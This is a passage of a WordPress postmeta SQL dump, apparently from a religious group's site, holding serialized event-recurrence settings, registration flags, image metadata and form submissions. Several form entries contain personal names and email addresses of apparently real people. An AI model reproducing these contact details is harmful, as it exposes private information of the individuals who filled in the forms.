11:30:00'),(104896,262520,'_EventStartDateUTC','2021-03-21 17:30:00'),(116375,262857,'_EventShowMapLink','1'),(104897,262520,'_EventEndDate','2021-03-21 13:00:00'),(104898,262520,'_EventEndDateUTC','2021-03-21 19:00:00'),(104899,262520,'_EventDuration','5400'),(117368,262892,'_EventCost',''),(117367,262892,'_EventCurrencyPosition','prefix'),(132438,262520,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:4:{i:262518;a:2:{s:9:\"timestamp\";i:1610883000;s:8:\"duration\";i:5400;}i:262519;a:2:{s:9:\"timestamp\";i:1613907000;s:8:\"duration\";i:5400;}i:262520;a:2:{s:9:\"timestamp\";i:1616326200;s:8:\"duration\";i:5400;}i:262521;a:2:{s:9:\"timestamp\";i:1618745400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:6:{i:262522;a:2:{s:9:\"timestamp\";i:1621164600;s:8:\"duration\";i:5400;}i:262523;a:2:{s:9:\"timestamp\";i:1624188600;s:8:\"duration\";i:5400;}i:262524;a:2:{s:9:\"timestamp\";i:1626607800;s:8:\"duration\";i:5400;}i:262525;a:2:{s:9:\"timestamp\";i:1629027000;s:8:\"duration\";i:5400;}i:262526;a:2:{s:9:\"timestamp\";i:1632051000;s:8:\"duration\";i:5400;}i:262527;a:2:{s:9:\"timestamp\";i:1634470200;s:8:\"duration\";i:5400;}}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(132436,262520,'_EventVenueID','262517'),(132435,262520,'_RTECmaxRegistrations','30'),(132434,262520,'_RTEClimitRegistrations','0'),(132433,262520,'_RTECwhoCanRegister','any'),(132432,262520,'_RTECdeadlineType','start'),(132431,262520,'_RTECregistrationsDisabled','1'),(132430,262520,'_EventNextPendingRecurrence','2022-12-18 11:30:00'),(132429,262520,'protect_children',''),(132421,262520,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-04-18\";s:14:\"EventStartDate\";s:19:\"2020-12-20 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 13:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(132420,262520,'boldgrid_hide_page_title','0'),(132422,262520,'_EventShowMapLink','1'),(132423,262520,'_EventShowMap','1'),(132424,262520,'_EventCurrencySymbol',''),(132504,263837,'_field_68','Testing'),(132505,263837,'_field_69','choll.03@comcast.net'),(132506,263837,'_field_70','(555) 555-5555'),(132443,262521,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-04-18\";s:14:\"EventStartDate\";s:19:\"2020-12-20 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 13:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(132442,262521,'boldgrid_hide_page_title','0'),(132477,263833,'_form_id','8'),(132478,263833,'_seq_num','6'),(132479,263834,'protect_children',''),(132480,263834,'_field_67','Test'),(132481,263834,'_field_68','Testing'),(132482,263834,'_field_69','choll.03@comcast.net'),(132483,263834,'_field_70','(555) 555-5555'),(132484,263834,'_field_71','Denver'),(132485,263834,'_field_74','ECK Temple Vahana Leader'),(132486,263834,'_field_75','THis is a test'),(132425,262520,'_EventCurrencyPosition','prefix'),(132426,262520,'_EventCost',''),(132427,262520,'_EventURL',''),(132428,262520,'_EventTimezone','America/Denver'),(132440,262521,'_EventOrigin','events-calendar'),(132441,262521,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";i:1613730641;s:24:\"boldgrid_hide_page_title\";i:1613730641;s:16:\"_EventRecurrence\";i:1613730641;s:17:\"_EventShowMapLink\";i:1613730641;s:13:\"_EventShowMap\";i:1613730641;s:20:\"_EventCurrencySymbol\";i:1613730641;s:22:\"_EventCurrencyPosition\";i:1613730642;s:10:\"_EventCost\";i:1613730642;s:9:\"_EventURL\";i:1613730642;s:14:\"_EventTimezone\";i:1613730642;s:16:\"protect_children\";i:1613730642;s:27:\"_EventNextPendingRecurrence\";i:1613730642;s:26:\"_RTECregistrationsDisabled\";i:1613730642;s:17:\"_RTECdeadlineType\";i:1613730642;s:19:\"_RTECwhoCanRegister\";i:1613730642;s:23:\"_RTEClimitRegistrations\";i:1613730642;s:21:\"_RTECmaxRegistrations\";i:1613730642;s:13:\"_EventVenueID\";i:1613730642;s:13:\"_thumbnail_id\";i:1613730642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1613730642;s:16:\"tribe_events_cat\";i:1613755842;}'),(132439,262521,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";i:1613730641;s:24:\"boldgrid_hide_page_title\";i:1613730641;s:16:\"_EventRecurrence\";i:1613730641;s:17:\"_EventShowMapLink\";i:1613730641;s:13:\"_EventShowMap\";i:1613730641;s:20:\"_EventCurrencySymbol\";i:1613730641;s:22:\"_EventCurrencyPosition\";i:1613730642;s:10:\"_EventCost\";i:1613730642;s:9:\"_EventURL\";i:1613730642;s:14:\"_EventTimezone\";i:1613730642;s:16:\"protect_children\";i:1613730642;s:27:\"_EventNextPendingRecurrence\";i:1613730642;s:26:\"_RTECregistrationsDisabled\";i:1613730642;s:17:\"_RTECdeadlineType\";i:1613730642;s:19:\"_RTECwhoCanRegister\";i:1613730642;s:23:\"_RTEClimitRegistrations\";i:1613730642;s:21:\"_RTECmaxRegistrations\";i:1613730642;s:13:\"_EventVenueID\";i:1613730642;s:13:\"_thumbnail_id\";i:1613730642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1613730642;s:16:\"tribe_events_cat\";i:1613755842;}'),(104925,262521,'_EventStartDate','2021-04-18 11:30:00'),(104926,262521,'_EventStartDateUTC','2021-04-18 17:30:00'),(104927,262521,'_EventEndDate','2021-04-18 13:00:00'),(104928,262521,'_EventEndDateUTC','2021-04-18 19:00:00'),(104929,262521,'_EventDuration','5400'),(117365,262892,'_EventVenueID','262507'),(132448,262521,'_EventCost',''),(132449,262521,'_EventURL',''),(132450,262521,'_EventTimezone','America/Denver'),(132451,262521,'protect_children',''),(132452,262521,'_EventNextPendingRecurrence','2022-12-18 11:30:00'),(132444,262521,'_EventShowMapLink','1'),(132445,262521,'_EventShowMap','1'),(132446,262521,'_EventCurrencySymbol',''),(132447,262521,'_EventCurrencyPosition','prefix'),(132503,263837,'_field_67','Test3'),(132487,263834,'_form_id','8'),(132488,263834,'_seq_num','7'),(132489,263835,'protect_children',''),(132490,263835,'_field_67','Test 2'),(132491,263835,'_field_68','Testign'),(132492,263835,'_field_69','choll.03@comcast.net'),(132493,263835,'_field_70','(555) 555-5555'),(132494,263835,'_field_71','Denver'),(132495,263835,'_field_74','ECK Temple Vahana Leader'),(132496,263835,'_field_75','Another test'),(132497,263835,'_form_id','8'),(132498,263835,'_seq_num','8'),(146786,265639,'passster_protection_type','password'),(132502,263837,'protect_children',''),(68196,253423,'_edit_lock','1579205371:2'),(73636,254586,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:144;s:6:\"height\";i:217;s:4:\"file\";s:38:\"2020/01/youth-ask-a-modern-prophet.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"youth-ask-a-modern-prophet-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"youth-ask-a-modern-prophet-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:38:\"youth-ask-a-modern-prophet-119x180.jpg\";s:5:\"width\";i:119;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"youth-ask-a-modern-prophet-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73635,254586,'_wp_attached_file','2020/01/youth-ask-a-modern-prophet.jpg'),(73634,254585,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:144;s:6:\"height\";i:216;s:4:\"file\";s:38:\"2020/01/wisdom-of-the-heart-book-3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"wisdom-of-the-heart-book-3-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"wisdom-of-the-heart-book-3-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:38:\"wisdom-of-the-heart-book-3-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"wisdom-of-the-heart-book-3-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73633,254585,'_wp_attached_file','2020/01/wisdom-of-the-heart-book-3.jpg'),(73632,254584,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:146;s:6:\"height\";i:217;s:4:\"file\";s:38:\"2020/01/wisdom-of-the-heart-book-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"wisdom-of-the-heart-book-1-146x150.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"wisdom-of-the-heart-book-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:38:\"wisdom-of-the-heart-book-1-121x180.jpg\";s:5:\"width\";i:121;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"wisdom-of-the-heart-book-1-146x150.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73631,254584,'_wp_attached_file','2020/01/wisdom-of-the-heart-book-1.jpg'),(73630,254583,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:146;s:6:\"height\";i:217;s:4:\"file\";s:39:\"2020/01/those-wonderful-eck-masters.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"those-wonderful-eck-masters-146x150.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:37:\"those-wonderful-eck-masters-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:39:\"those-wonderful-eck-masters-121x180.jpg\";s:5:\"width\";i:121;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:39:\"those-wonderful-eck-masters-146x150.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(121154,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121176,263208,'_EventEndDate','2021-01-16 14:15:00'),(121182,263208,'_EventCost',''),(121153,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121175,263208,'_EventStartDate','2021-01-16 13:00:00'),(121183,263208,'_EventURL',''),(121152,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121174,263208,'_EventShowMap',''),(121151,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121173,263208,'_EventShowMapLink',''),(121184,263208,'_EventTimezone','America/Denver'),(121185,263208,'_EventTimezoneAbbr','MST'),(118877,262955,'_EventCost',''),(50966,129179,'protect_children',''),(121161,263208,'_EventOrigin','events-calendar'),(121150,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121172,263208,'boldgrid_hide_page_title','0'),(121186,263208,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(97099,262290,'_field_224','Samuel'),(97100,262290,'_field_225','Cole'),(97101,262290,'_field_226','samuel30030@att.net'),(97102,262290,'_field_227','CO'),(97103,262290,'_field_228','US'),(97104,262290,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(97105,262290,'_form_id','21'),(97106,262290,'_seq_num','114'),(121162,263208,'_EventOrigin','events-calendar'),(121163,263208,'_EventOrigin','events-calendar'),(121164,263208,'_EventOrigin','events-calendar'),(121165,263208,'_EventOrigin','events-calendar'),(121166,263208,'_EventOrigin','events-calendar'),(121167,263208,'_EventOrigin','events-calendar'),(121168,263208,'_EventOrigin','events-calendar'),(121169,263208,'_EventOrigin','events-calendar'),(121170,263208,'_EventOrigin','events-calendar'),(121144,263208,'protect_children',''),(121145,263208,'protect_children',''),(121146,263208,'protect_children',''),(121147,263208,'protect_children',''),(121148,263208,'protect_children',''),(121149,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121187,263208,'_RTECregistrationsDisabled','1'),(121139,263208,'_EventOrigin','events-calendar'),(121137,263208,'protect_children',''),(121138,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(120271,263018,'_EventOrigin','events-calendar'),(120298,263018,'_RTEClimitRegistrations','0'),(179392,268208,'mec_repeat_end_at_date',''),(61817,247332,'_menu_item_url',''),(96994,262284,'_field_224','Martina'),(64473,249746,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:555;s:6:\"height\";i:328;s:4:\"file\";s:30:\"2020/01/Youth-in-ECK-sized.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Youth-in-ECK-sized-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Youth-in-ECK-sized-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"Youth-in-ECK-sized-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"Youth-in-ECK-sized-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"Youth-in-ECK-sized-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"Youth-in-ECK-sized-250x148.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:30:\"Youth-in-ECK-sized-550x325.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:30:\"Youth-in-ECK-sized-305x180.jpg\";s:5:\"width\";i:305;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:30:\"Youth-in-ECK-sized-508x300.jpg\";s:5:\"width\";i:508;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"Youth-in-ECK-sized-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:30:\"Youth-in-ECK-sized-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";